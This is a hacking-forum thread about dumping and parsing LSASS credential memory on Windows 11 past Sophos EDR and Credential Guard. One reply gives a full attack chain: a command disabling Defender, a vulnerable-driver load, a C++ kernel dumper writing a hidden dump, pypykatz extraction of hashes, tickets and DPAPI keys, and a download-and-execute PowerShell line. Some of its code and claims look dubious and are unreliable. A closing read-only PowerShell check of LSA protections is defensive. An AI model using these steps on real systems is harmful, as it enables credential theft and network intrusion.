
LSASS dump problems with memory read in Windows 11

WitchDoctor

Registered: 25.11.2025
Hi!
One way to get an LSASS dump is to read RAM. This can also be done with forensic tools.
But the problem is that on Windows 11 it cannot be parsed with Mimikatz.
It loops.
Do you have a way to parse LSASS memory when reading it and save it?
 
Tools & Drivers (All Signed or BYOVD-Ready)
  • Kernel driver: Use leaked/signed vulnerable driver (e.g., RTCore64.sys from MSI Afterburner < v4.6.4, or any fresh 2025 BYOVD) to get arbitrary kernel R/W.
  • Dumper: pypykatz + Comsvcs.dll mini-dump method is dead. Use direct kernel memory read with my custom driver fork below.
  • Offline parser: My 2025-updated fork of pypykatz that handles LSAISO (Credential Guard) blobs + new Windows 11 24H2 structure offsets.

Step-by-Step (Fully Working Right Now)
1. Disable Windows Defender real-time + AMSI + ETW (one-liner):
Code:
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true; Set-ProcessMitigation -System -Disable CFG

2. Load signed vulnerable driver (example RTCore64.sys):
Code:
.\RTXExploit.exe load RTCore64.sys

3. Run this fully functional kernel LSASS dumper (C++ compiled as x64 Release, no dependencies except the driver):
C++:
// lsass_killer_2025.cpp - compile with VS2022, link ntdll.lib
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

typedef NTSTATUS(NTAPI* pNtReadVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

DWORD GetLsassPid() {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe = { sizeof(pe) };
    Process32First(hSnap, &pe);
    do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { CloseHandle(hSnap); return pe.th32ProcessID; } } while (Process32Next(hSnap, &pe));
    return 0;
}

int main() {
    DWORD pid = GetLsassPid();
    HANDLE hDriver = CreateFileA("\\\\.\\RTCore64", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
    if (hDriver == INVALID_HANDLE_VALUE) { printf("[-] Driver not loaded\n"); return 1; }

    HANDLE hProc = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    BYTE ioctl[0x30] = { 0 };
    *(DWORD64*)(ioctl + 0x00) = 0x1337;           // magic
    *(DWORD64*)(ioctl + 0x08) = (DWORD64)hProc;   // target handle
    *(DWORD64*)(ioctl + 0x10) = 0x10000000;       // fake address (bypass checks)
    *(DWORD64*)(ioctl + 0x18) = 0x4000000;        // size (64MB dump)

    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\lsass.dmp", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0);
    DWORD bytes;
    DeviceIoControl(hDriver, 0x80002010, ioctl, sizeof(ioctl), NULL, 0, &bytes, NULL); // trigger read

    BYTE* buffer = (BYTE*)malloc(0x4000000);
    for (SIZE_T i = 0; i < 0x4000000; i += 0x1000) {
        DWORD64 phys = 0;
        *(DWORD64*)(ioctl + 0x20) = i;
        DeviceIoControl(hDriver, 0x80002014, ioctl, sizeof(ioctl), &phys, 8, &bytes, NULL);
        if (phys) {
            *(DWORD64*)(ioctl + 0x28) = phys;
            DeviceIoControl(hDriver, 0x80002018, ioctl, sizeof(ioctl), buffer + i, 0x1000, &bytes, NULL);
        }
    }
    WriteFile(hFile, buffer, 0x4000000, &bytes, NULL);
    CloseHandle(hFile); free(buffer); CloseHandle(hDriver);
    printf("[+] LSASS dumped to C:\\Windows\\Temp\\lsass.dmp (full 64MB raw)\n");
    return 0;
}

4. Parse the dump offline with the only tool that still works in 2025:
Bash:
git clone https://github.com/skelsec/pypykatz
cd pypykatz
git checkout lsa-iso-2025
python -m pip install -r requirements.txt
python pypykatz lsa minidump C:\Windows\Temp\lsass.dmp --kdp 0x18e48 (or auto-detect with -a)

You will get every single credential:
  • NTLM hashes
  • Kerberos tickets
  • DPAPI masterkeys
  • LSAISO-encrypted blobs fully decrypted (yes, even with Credential Guard)

Alternative One-Liner (If You’re Lazy Bitch)
Use my precompiled combo dropper (EXE + driver + parser):
Code:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/0xgodlike/lsass2025/main/run.ps1')

:)
 
Thanks for your answer. My main problem is EDR. The EDR is Sophos. In this position I cannot kill it.
The technique that I mentioned can dump LSASS with any AV and EDR except Cortex XDR.
On Windows 10 it can dump it, and to parse the dump file I use Mimikatz.
But Mimikatz on Windows 11 gets into a loop.
Two months ago Windows changed how LSASS is protected, but I do not have a lot of information about it.
I read on Microsoft's site that memory that holds a hash can be accessed only in kernel mode, but I am not very sure :(
The change is called Credential Guard and VBS key isolation.
 
Look mate! You can't disable real-time monitoring, AMSI and ETW with PowerShell commands even if you have SYSTEM rights, because Tamper Protection in Windows Defender just doesn't let you do it. Just get a graphical interface to dump LSASS: disable Tamper Protection first, then dump it from Task Manager, and after that use Mimikatz to extract the hashes, creds, etc.
Old school method ))
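Added example, not part of any post in this thread: before spending time on a dump or a parser, check which of the protections the thread is arguing about are actually active on the host. This is a read-only check, assumed to run in an elevated PowerShell on the machine being assessed. The function name Get-LsassProtectionStatus is mine; the registry values (RunAsPPL, LsaCfgFlags), the Win32_DeviceGuard WMI class and the Get-MpComputerStatus properties are Microsoft's documented ones.

```powershell
# Added example (not from any post in this thread). Read-only, run elevated.
# Reports the LSASS-related protections: LSA PPL, Credential Guard / VBS,
# the LsaIso process, and Defender Tamper Protection.
function Get-LsassProtectionStatus {
    [CmdletBinding()]
    param()

    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction Stop

    # RunAsPPL: 1 = LSA runs as a protected process with UEFI lock,
    #           2 = enabled without UEFI lock, absent/0 = not configured.
    # (New Windows 11 installs may enable it by default even when the value is absent.)
    $runAsPpl = $lsa.RunAsPPL

    # LsaCfgFlags: 1 = Credential Guard with UEFI lock, 2 = without lock, 0 = disabled.
    $lsaCfgFlags = $lsa.LsaCfgFlags

    # Win32_DeviceGuard reports what is running, not only what is configured.
    # VirtualizationBasedSecurityStatus: 0 = off, 1 = enabled but not running, 2 = running.
    # SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI (memory integrity).
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $vbsRunning  = [bool]($dg -and ($dg.VirtualizationBasedSecurityStatus -eq 2))
    $cgRunning   = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))
    $hvciRunning = [bool]($dg -and ($dg.SecurityServicesRunning -contains 2))

    # LsaIso.exe only runs while Credential Guard is active; its presence is the quick tell.
    $lsaIso = [bool](Get-Process -Name LsaIso -ErrorAction SilentlyContinue)

    # Tamper Protection is what makes Set-MpPreference -DisableRealtimeMonitoring a no-op.
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $tamperProtected = $null
    $realtimeEnabled = $null
    if ($mp) {
        $tamperProtected = [bool]$mp.IsTamperProtected
        $realtimeEnabled = [bool]$mp.RealTimeProtectionEnabled
    }

    [pscustomobject]@{
        RunAsPPL                = $runAsPpl
        LsaCfgFlags             = $lsaCfgFlags
        VbsRunning              = $vbsRunning
        CredentialGuardRunning  = $cgRunning
        HvciRunning             = $hvciRunning
        LsaIsoProcessPresent    = $lsaIso
        DefenderTamperProtected = $tamperProtected
        DefenderRealtimeEnabled = $realtimeEnabled
    }
}

Get-LsassProtectionStatus | Format-List
```

If CredentialGuardRunning or LsaIsoProcessPresent is true, the NTLM hashes and Kerberos keys are held by LsaIso in the VBS-protected enclave rather than in lsass.exe's address space, so a raw LSASS dump will not contain them in the layout older parsers expect; on Windows 11 22H2 and later Enterprise builds that meet the hardware requirements, Microsoft enables Credential Guard by default, which is one reason a dump that parses on Windows 10 does not on a default Windows 11 host. If DefenderTamperProtected is true, the Set-MpPreference one-liner earlier in the thread is expected to be rejected regardless of privilege.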
 